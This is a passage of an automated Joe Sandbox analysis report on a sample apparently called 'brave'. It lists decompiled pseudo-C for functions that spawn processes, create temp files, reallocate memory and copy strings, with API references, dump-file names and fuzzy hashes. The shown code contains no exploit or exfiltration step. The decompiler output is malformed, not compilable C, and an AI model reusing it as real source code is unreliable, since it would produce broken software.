				_a76 = 0;
				_a84 = 0;
				_a60 = 0;
				_a20 = 0;
				_a12 = 0;
				_a4 = 0x8000000;
				_v4 = 0;
				_v12 = 0;
				 *_t49(); // executed
				if (_t33 == 0) goto 0x15b929b7;
				_t50 =  *0x15e46660; // 0x7ff715e51058
				_t32 =  *_t50();
				E00007FF77FF715B94D0D();
				return _t32;
			}

0x7ff715b928aa
0x7ff715b928bd
0x7ff715b928c7
0x7ff715b928cd
0x7ff715b928d2
0x7ff715b928da
0x7ff715b928fa
0x7ff715b928ff
0x7ff715b9290b
0x7ff715b9290e
0x7ff715b9291e
0x7ff715b9292b
0x7ff715b92930
0x7ff715b92937
0x7ff715b9293e
0x7ff715b92949
0x7ff715b92952
0x7ff715b9295b
0x7ff715b92967
0x7ff715b92970
0x7ff715b92979
0x7ff715b92982
0x7ff715b9298a
0x7ff715b92992
0x7ff715b9299b
0x7ff715b929a4
0x7ff715b929a6
0x7ff715b929b5
0x7ff715b929ba
0x7ff715b929cc

APIs

memset.MSVCRT ref: 00007FF715B928DA
CreateProcessInternalW.KERNELBASE ref: 00007FF715B9299B

Strings

h, xrefs: 00007FF715B9293E

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: CreateInternalProcessmemset
String ID: h
API String ID: 101748716-2439710439
Opcode ID: f7d899a7f5cd1f8d80b8283f1cd465d5e67c1af32a4d658f7ff7f1fd2331c44a
Instruction ID: ba35158659931e1a518d74fc4cd4ea6790e5da2cf06e1d7be92b99caffddb179
Opcode Fuzzy Hash: f7d899a7f5cd1f8d80b8283f1cd465d5e67c1af32a4d658f7ff7f1fd2331c44a
Instruction Fuzzy Hash: F0213532608B8092E3249B25F41479BB6A4FBC5B94F904139EACC47BA8CFBCC149CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA4030 Relevance: 3.7, APIs: 2, Instructions: 652
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00007FF77FF715BA4030(signed int* __rcx, long long __rdx, void* __r8) {
				intOrPtr _t96;
				signed int _t104;
				signed int _t110;
				signed int _t111;
				long long _t134;
				intOrPtr _t184;
				intOrPtr _t185;
				intOrPtr _t187;
				intOrPtr _t188;
				intOrPtr _t189;
				intOrPtr _t190;
				intOrPtr _t192;
				intOrPtr _t193;
				intOrPtr _t195;
				intOrPtr _t196;
				intOrPtr _t197;
				intOrPtr _t199;
				intOrPtr _t200;
				intOrPtr _t201;
				intOrPtr _t203;
				intOrPtr _t205;
				intOrPtr _t206;
				intOrPtr _t208;
				intOrPtr _t210;
				signed long long _t228;
				signed long long _t230;
				signed int* _t250;
				intOrPtr* _t251;
				long long _t252;
				long long _t259;
				signed int _t263;

				_t250 = __rcx;
				_t252 = __rdx;
				if (__rcx == 0) goto 0x15ba45f0;
				_t251 =  *0x15e46920; // 0x7ff715e51400
				_t184 =  *_t251;
				if (_t184 == 0) goto 0x15ba42f8;
				if ( *((long long*)(_t184 + 0x38)) != 0) goto 0x15ba4318;
				 *((long long*)(_t184 + 0x38)) = 0x15e42bd0;
				E00007FF77FF715BA84D0(0x15e42bd0);
				_t185 =  *_t251;
				if (_t185 == 0) goto 0x15ba432d;
				if ( *((long long*)(_t185 + 0x48)) == 0) goto 0x15ba4458;
				_t96 =  *((intOrPtr*)( *((intOrPtr*)(_t185 + 0x48))));
				goto 0x15ba40e5;
				_t228 =  *((intOrPtr*)( *_t251 + 0x40));
				_t187 =  *_t251;
				if (_t96 -  *_t228 >= 0) goto 0x15ba4100;
				if ( *((long long*)(_t187 + 0x10)) == 0) goto 0x15ba4358;
				if ( *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x10)))) + _t228 * 8)) == 0) goto 0x15ba4470;
				if (_t187 == 0) goto 0x15ba4370;
				if ( *((long long*)(_t187 + 0x40)) != 0) goto 0x15ba40b0;
				 *((long long*)(_t187 + 0x40)) = 0x15e513c4;
				if (_t96 + 1 -  *0x15e513c4 < 0) goto 0x15ba40bb;
				goto 0x15ba414d;
				asm("o16 nop [eax+eax]");
				_t230 =  *((intOrPtr*)(_t187 + 0x48));
				_t188 =  *_t251;
				if (0 -  *_t230 >= 0) goto 0x15ba4168;
				if ( *((long long*)(_t188 + 0x10)) == 0) goto 0x15ba43d8;
				_t263 = _t230 * 8;
				if ( *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t188 + 0x10)))) + _t230 * 8)) == 0) goto 0x15ba44d0;
				if (_t188 == 0) goto 0x15ba43f0;
				if ( *((long long*)(_t188 + 0x48)) != 0) goto 0x15ba4118;
				 *((long long*)(_t188 + 0x48)) = 0x15e513c0;
				if (1 -  *0x15e513c0 < 0) goto 0x15ba4123;
				if (_t188 == 0) goto 0x15ba4765;
				if ( *((long long*)(_t188 + 0x40)) == 0) goto 0x15ba45b0;
				_t189 =  *_t251;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t188 + 0x40)))) == 0x100000) goto 0x15ba45cb;
				if (_t189 == 0) goto 0x15ba47ee;
				_t134 =  *((long long*)(_t189 + 0x40));
				if (_t134 == 0) goto 0x15ba4608;
				_t190 =  *_t251;
				if (_t134 != 0) goto 0x15ba41cb;
				if ( *((long long*)(_t190 + 0x40)) != 0) goto 0x15ba47e5;
				 *((long long*)(_t190 + 0x40)) = 0x15e513c4;
				_t104 =  >  ? 0x100000 :  *0x15e513c4 + 1;
				if (_t190 == 0) goto 0x15ba4997;
				if ( *((long long*)(_t190 + 0x10)) == 0) goto 0x15ba46d0;
				realloc(??, ??);
				_t259 =  *((intOrPtr*)(_t190 + 0x10));
				_t192 =  *_t251;
				if (_t259 == 0) goto 0x15ba4b52;
				if (_t192 == 0) goto 0x15ba49d5;
				if ( *((long long*)(_t192 + 0x40)) == 0) goto 0x15ba46b8;
				_t193 =  *_t251;
				r8d = _t104;
				r8d = r8d -  *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x40))));
				if ( *(_t193 + 0x40) == 0) goto 0x15ba46a0;
				memset(??, ??, ??);
				_t195 =  *_t251;
				if (_t195 == 0) goto 0x15ba4971;
				if ( *((long long*)(_t195 + 0x10)) == 0) goto 0x15ba4680;
				_t196 =  *_t251;
				 *((long long*)( *((intOrPtr*)(_t195 + 0x10)))) = _t259;
				if (_t196 == 0) goto 0x15ba4852;
				if ( *((long long*)(_t196 + 0x40)) == 0) goto 0x15ba4670;
				_t197 =  *_t251;
				r12d =  *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x40))));
				if ( *((long long*)(_t197 + 0x48)) == 0) goto 0x15ba4660;
				r12d = r12d + 1;
				 *((intOrPtr*)( *((intOrPtr*)(_t197 + 0x48)))) = r12d;
				if ( *(_t197 + 0x40) == 0) goto 0x15ba4650;
				_t110 =  *( *(_t197 + 0x40));
				 *__rcx = _t110;
				if ( *(_t197 + 0x40) == 0) goto 0x15ba4640;
				 *( *(_t197 + 0x40)) = _t104;
				if (__rdx == 0) goto 0x15ba473d;
				if ( *((long long*)(_t197 + 0x10)) == 0) goto 0x15ba4708;
				 *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t197 + 0x10)))) + (_t259 +  *(_t193 + 0x40) * 8) * 8)) = __rdx;
				goto 0x15ba44f6;
				E00007FF77FF715BA7060(); // executed
				if ( *((long long*)(_t197 + 0x38)) == 0) goto 0x15ba406b;
				if ( *_t251 != 0) goto 0x15ba4318;
				E00007FF77FF715BA7060();
				E00007FF77FF715BA84D0( *((intOrPtr*)( *_t251 + 0x38)));
				_t199 =  *_t251;
				if (_t199 != 0) goto 0x15ba4087;
				E00007FF77FF715BA7060();
				_t200 =  *_t251;
				if ( *((long long*)(_t199 + 0x48)) == 0) goto 0x15ba4458;
				if (_t200 != 0) goto 0x15ba4092;
				E00007FF77FF715BA7060();
				goto 0x15ba4092;
				 *((long long*)(_t200 + 0x10)) = _t259;
				goto 0x15ba40ca;
				E00007FF77FF715BA7060();
				_t201 =  *_t251;
				if ( *((long long*)(_t200 + 0x40)) == 0) goto 0x15ba40f5;
				if (_t201 != 0) goto 0x15ba40b0;
				E00007FF77FF715BA7060();
				if ( *((intOrPtr*)( *((intOrPtr*)(_t201 + 0x40)))) - _t104 <= 0) goto 0x15ba4b5d;
				_t203 =  *_t251;
				if (_t203 != 0) goto 0x15ba40bb;
				E00007FF77FF715BA7060();
				if ( *((long long*)(_t203 + 0x10)) == 0) goto 0x15ba4358;
				if ( *_t251 != 0) goto 0x15ba40c6;
				E00007FF77FF715BA7060();
				_t205 =  *_t251;
				goto 0x15ba40ca;
				 *((long long*)(_t205 + 0x10)) = _t259;
				goto 0x15ba4132;
				E00007FF77FF715BA7060();
				_t206 =  *_t251;
				if ( *((long long*)(_t205 + 0x48)) == 0) goto 0x15ba415d;
				if (_t206 != 0) goto 0x15ba4118;
				E00007FF77FF715BA7060();
				if ( *((intOrPtr*)( *((intOrPtr*)(_t206 + 0x48)))) - _t104 <= 0) goto 0x15ba4b65;
				_t208 =  *_t251;
				if (_t208 != 0) goto 0x15ba4123;
				E00007FF77FF715BA7060();
				if ( *((long long*)(_t208 + 0x10)) == 0) goto 0x15ba43d8;
				if ( *_t251 != 0) goto 0x15ba412e;
				E00007FF77FF715BA7060();
				_t210 =  *_t251;
				goto 0x15ba4132;
				 *((long long*)(_t210 + 0x48)) = 0x15e513c0;
				goto 0x15ba4099;
				 *_t250 = _t104;
				if (_t252 == 0) goto 0x15ba4570;
				if (_t210 == 0) goto 0x15ba4728;
				_t111 = _t110 & 0xffffff00 |  *((long long*)(_t210 + 0x10)) != 0x00000000;
				if (_t111 == 0) goto 0x15ba455c;
				if (_t210 == 0) goto 0x15ba47cb;
				 *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x10)))) + _t263)) = _t252;
				if (_t210 == 0) goto 0x15ba46f3;
				if ((_t111 & 0xffffff00 |  *((long long*)(_t210 + 0x38)) != 0x00000000) == 0) goto 0x15ba454f;
				if (_t210 != 0) goto 0x15ba4502;
				E00007FF77FF715BA7060();
				goto 0x15ba4502;
				 *_t250 = _t104;
				if (_t252 == 0) goto 0x15ba451c;
				if (_t210 == 0) goto 0x15ba4a4e;
				if ( *((long long*)(_t210 + 0x10)) == 0) goto 0x15ba46e3;
				 *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x10)))) + _t263)) = _t252;
				if (_t210 == 0) goto 0x15ba4539;
				if ( *((long long*)(_t210 + 0x38)) == 0) goto 0x15ba454f;
				E00007FF77FF715BA8410( *((intOrPtr*)(_t210 + 0x38)));
				return 0;
			}

0x7ff715ba403e
0x7ff715ba4041
0x7ff715ba4047
0x7ff715ba404d
0x7ff715ba4054
0x7ff715ba405a
0x7ff715ba4065
0x7ff715ba4072
0x7ff715ba4076
0x7ff715ba407b
0x7ff715ba4081
0x7ff715ba408c
0x7ff715ba4099
0x7ff715ba40a9
0x7ff715ba40b0
0x7ff715ba40b4
0x7ff715ba40b9
0x7ff715ba40c0
0x7ff715ba40dc
0x7ff715ba40e8
0x7ff715ba40f3
0x7ff715ba40f8
0x7ff715ba40fe
0x7ff715ba4110
0x7ff715ba4112
0x7ff715ba4118
0x7ff715ba411c
0x7ff715ba4121
0x7ff715ba4128
0x7ff715ba4137
0x7ff715ba4144
0x7ff715ba4150
0x7ff715ba415b
0x7ff715ba4160
0x7ff715ba4166
0x7ff715ba416b
0x7ff715ba4176
0x7ff715ba4180
0x7ff715ba4189
0x7ff715ba4192
0x7ff715ba4198
0x7ff715ba419d
0x7ff715ba41a7
0x7ff715ba41ae
0x7ff715ba41b5
0x7ff715ba41c2
0x7ff715ba41d6
0x7ff715ba41e3
0x7ff715ba41ee
0x7ff715ba41fb
0x7ff715ba4200
0x7ff715ba4203
0x7ff715ba4209
0x7ff715ba4212
0x7ff715ba421d
0x7ff715ba4227
0x7ff715ba422e
0x7ff715ba4231
0x7ff715ba423b
0x7ff715ba424d
0x7ff715ba4252
0x7ff715ba4258
0x7ff715ba4263
0x7ff715ba426d
0x7ff715ba4270
0x7ff715ba4276
0x7ff715ba4281
0x7ff715ba428b
0x7ff715ba428e
0x7ff715ba4296
0x7ff715ba42a0
0x7ff715ba42a4
0x7ff715ba42ac
0x7ff715ba42b6
0x7ff715ba42b8
0x7ff715ba42bf
0x7ff715ba42c9
0x7ff715ba42ce
0x7ff715ba42d9
0x7ff715ba42e8
0x7ff715ba42ec
0x7ff715ba42f8
0x7ff715ba4305
0x7ff715ba430e
0x7ff715ba4310
0x7ff715ba431c
0x7ff715ba4321
0x7ff715ba4327
0x7ff715ba432d
0x7ff715ba4337
0x7ff715ba433a
0x7ff715ba4343
0x7ff715ba4349
0x7ff715ba434e
0x7ff715ba4358
0x7ff715ba4363
0x7ff715ba4370
0x7ff715ba437a
0x7ff715ba437d
0x7ff715ba4386
0x7ff715ba438c
0x7ff715ba4397
0x7ff715ba439d
0x7ff715ba43a3
0x7ff715ba43a9
0x7ff715ba43b9
0x7ff715ba43be
0x7ff715ba43c4
0x7ff715ba43cd
0x7ff715ba43d0
0x7ff715ba43d8
0x7ff715ba43e3
0x7ff715ba43f0
0x7ff715ba43fa
0x7ff715ba43fd
0x7ff715ba4406
0x7ff715ba440c
0x7ff715ba4417
0x7ff715ba441d
0x7ff715ba4423
0x7ff715ba4429
0x7ff715ba4439
0x7ff715ba443e
0x7ff715ba4444
0x7ff715ba444d
0x7ff715ba4450
0x7ff715ba445f
0x7ff715ba4463
0x7ff715ba4470
0x7ff715ba4475
0x7ff715ba447e
0x7ff715ba4489
0x7ff715ba448e
0x7ff715ba4497
0x7ff715ba44a4
0x7ff715ba44ab
0x7ff715ba44bb
0x7ff715ba44c4
0x7ff715ba44c6
0x7ff715ba44cb
0x7ff715ba44d0
0x7ff715ba44d5
0x7ff715ba44da
0x7ff715ba44e5
0x7ff715ba44f2
0x7ff715ba44f9
0x7ff715ba4500
0x7ff715ba4506
0x7ff715ba451b

APIs

realloc.MSVCRT ref: 00007FF715BA41FB

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: e336d157d8cadeff1a172b5fc071843bb7c4cd571cbffa88969bb0cc07652b88
Instruction ID: ffe8014fc1f6bc8a7938d4c60247b018481fc3e3d17e849c93ad38ec0e72a893
Opcode Fuzzy Hash: e336d157d8cadeff1a172b5fc071843bb7c4cd571cbffa88969bb0cc07652b88
Instruction Fuzzy Hash: EF62F876A09F0681EA7EAB09E050379A7A0EF44FA4F954475CA5D073B1EF7DE848C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA3F00 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00007FF77FF715BA3F00(void* __rax, intOrPtr* __rcx, void* __rdx) {
				intOrPtr _t8;
				void* _t14;

				_t14 = __rax;
				if (__rdx == 0) goto 0x15ba4018;
				if ( *__rcx == 1) goto 0x15ba3f68;
				E00007FF77FF715BA0F00(__rcx);
				_t1 = _t14 + 8; // 0x8
				E00007FF77FF715BA04E0(_t1);
				_t8 =  *__rcx;
				if (_t8 == 0) goto 0x15ba3f80;
				if (_t8 != 1) goto 0x15ba3ff0;
				E00007FF77FF715BA0800(_t1);
				E00007FF77FF715BA1110(_t14);
				return 0;
			}

0x7ff715ba3f00
0x7ff715ba3f16
0x7ff715ba3f1f
0x7ff715ba3f21
0x7ff715ba3f26
0x7ff715ba3f30
0x7ff715ba3f35
0x7ff715ba3f39
0x7ff715ba3f3e
0x7ff715ba3f47
0x7ff715ba3f4f
0x7ff715ba3f61

APIs

Part of subcall function 00007FF715BA0F00: calloc.MSVCRT(?,?,00007FFC2FC93CA0,00007FF715BA3F26,?,?,?,?,00000227AD1A17F0,00007FFC2FC93CA0,?,00007FF715BA029B,00000227AD1A17F0,00000000,00007FFC2FC93CA0,00007FF715B932FA), ref: 00007FF715BA10A4

fprintf.MSVCRT ref: 00007FF715BA400B

Strings

once %p is %d, xrefs: 00007FF715BA4001

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: callocfprintf
String ID: once %p is %d
API String ID: 3366074580-95064319
Opcode ID: 6e9b06d7a7e3d48af93b056f8de7be245cf1a8abe53ffd6387711d9ba53eb8ef
Instruction ID: 9c2f0515bc76b33a6a338ba40deef9bfc995d0f1dd5ae26aebc1dbbac0a92680
Opcode Fuzzy Hash: 6e9b06d7a7e3d48af93b056f8de7be245cf1a8abe53ffd6387711d9ba53eb8ef
Instruction Fuzzy Hash: A431B876A19F0181FA7AAB15A4411B9E2A4BF44FA4F844036DE5D073B5DF3CD549C220

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B927F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00007FF77FF715B927F0(void* __edi, void* __esp, long long __rcx, void* __rdx, long long __r8) {
				void* _v136;
				long long _v144;
				char _v148;
				char _v156;
				long long _v172;
				long long _v180;
				long long _v188;
				long long _v196;
				long long _v204;
				intOrPtr _v212;
				long long _v220;
				long long _v228;
				void* _t19;
				intOrPtr* _t30;

				_v144 = 0;
				memset(__edi, 0, 0xd << 0);
				_v196 = __r8;
				_v172 =  &_v156;
				_v188 =  &_v148;
				_t30 =  *0x15e46640; // 0x7ff715e51078
				_v212 = r9d;
				r9d = 0;
				_v148 = 0x68;
				 *((long long*)(__rcx)) = 0;
				 *((long long*)(__rcx + 8)) = 0;
				 *((long long*)(__rcx + 0x10)) = 0;
				_v180 = __rcx;
				_v204 = 0;
				_v220 = 0;
				_v228 = 0;
				_t19 =  *_t30(); // executed
				return _t19;
			}

0x7ff715b92809
0x7ff715b92812
0x7ff715b9281a
0x7ff715b92822
0x7ff715b9282e
0x7ff715b92833
0x7ff715b9283a
0x7ff715b9283f
0x7ff715b92842
0x7ff715b9284a
0x7ff715b92852
0x7ff715b9285b
0x7ff715b92864
0x7ff715b92869
0x7ff715b92872
0x7ff715b9287a
0x7ff715b92883
0x7ff715b92892

APIs

CreateProcessInternalW.KERNELBASE ref: 00007FF715B92883

Strings

h, xrefs: 00007FF715B92842

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: CreateInternalProcess
String ID: h
API String ID: 2186235152-2439710439
Opcode ID: 8bba045a17cefcb5b05322b069f8357d251dc813df342985f80b1a2e19d1b3c7
Instruction ID: 7519a42e3d2de698dd5ed9f165569fd2cd5132b089ad3b3078d5ceda22164a1f
Opcode Fuzzy Hash: 8bba045a17cefcb5b05322b069f8357d251dc813df342985f80b1a2e19d1b3c7
Instruction Fuzzy Hash: CA01E832618B8082E7508F55F45874BB7A4F784794FA08129EBC807B68DFBDC158CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B94880 Relevance: 3.1, APIs: 2, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00007FF77FF715B94880(void* __edi, void* __esp, void* __rax, void* __rcx, void* __rdx, void* __r9) {
				void* _v596;
				void* _v608;
				char _v1112;
				void* _t13;
				void* _t27;
				void* _t40;

				_t27 = __rax;
				r12d = r8d;
				memset(__edi + 0x41, memset(__edi, 0, 0x41 << 0), 0x41 << 0);
				GetTempPathW(??, ??);
				r8d = 0;
				GetTempFileNameW(??, ??, ??, ??); // executed
				r8d = r12d;
				_t13 = E00007FF77FF715B94530(__rax,  &_v1112, __rdx, _t40); // executed
				if (_t27 - 1 - 0xfffffffd <= 0) goto 0x15b94928;
				return _t13;
			}

0x7ff715b94880
0x7ff715b9489b
0x7ff715b948c4
0x7ff715b948d7
0x7ff715b948e0
0x7ff715b948e8
0x7ff715b948ee
0x7ff715b948f7
0x7ff715b94907
0x7ff715b94921

APIs

GetTempPathW.KERNEL32 ref: 00007FF715B948D7
GetTempFileNameW.KERNEL32 ref: 00007FF715B948E8

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: Temp$FileNamePath
String ID:
API String ID: 3285503233-0
Opcode ID: a36c255382f679e79db51f353ae47516e0c81a59047a74ca63f1b497fb31ef1a
Instruction ID: 7e7a0e6168f23bd35b3386f253ecca851809f01f714cb468c23f705311fad2df
Opcode Fuzzy Hash: a36c255382f679e79db51f353ae47516e0c81a59047a74ca63f1b497fb31ef1a
Instruction Fuzzy Hash: 973194A6708B8581E6749616F95476AE351FB85BF4F904231EEBC0BBE8DF7CD0498700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B94000 Relevance: 2.5, APIs: 2, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E00007FF77FF715B94000(void* __eax, void* __edi, void* __esp, void* __rax, void* __rcx) {
				char _v584;
				int _t9;
				void* _t12;
				void* _t26;
				signed long long _t27;
				void* _t36;
				void* _t37;

				r12d = 0;
				_t35 =  &_v584;
				0x15bb1630();
				_t37 = __rax;
				goto 0x15b9403f;
				asm("o16 nop [cs:eax+eax]");
				if (__eax == 0x2f) goto 0x15b94049;
				_t27 = _t26 + 1;
				if (__rax - _t27 < 0) goto 0x15b9407c;
				_t9 =  *(__rcx + _t27 * 2) & 0x0000ffff;
				if (_t9 != 0x5c) goto 0x15b94030;
				memset(__edi, _t9, 0x41 << 0);
				0x15bb1638();
				 *((short*)( &_v584 + _t27 * 2)) = 0;
				_t12 = E00007FF77FF715B93CD0(_t36, _t35); // executed
				if (_t37 - _t27 + 1 >= 0) goto 0x15b9403f;
				return _t12;
			}

0x7ff715b94011
0x7ff715b94017
0x7ff715b9401c
0x7ff715b94021
0x7ff715b94024
0x7ff715b94026
0x7ff715b94034
0x7ff715b94036
0x7ff715b9403d
0x7ff715b9403f
0x7ff715b94047
0x7ff715b94059
0x7ff715b9405f
0x7ff715b94069
0x7ff715b94072
0x7ff715b9407a
0x7ff715b9408b

APIs

wcslen.MSVCRT ref: 00007FF715B9401C
wcscpy.MSVCRT ref: 00007FF715B9405F

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: wcscpywcslen
String ID:
API String ID: 225642448-0
Opcode ID: 97bf6b18d38952cc1e7bab5118d0ebb15cef15114d82f46dfd9f4697655be916
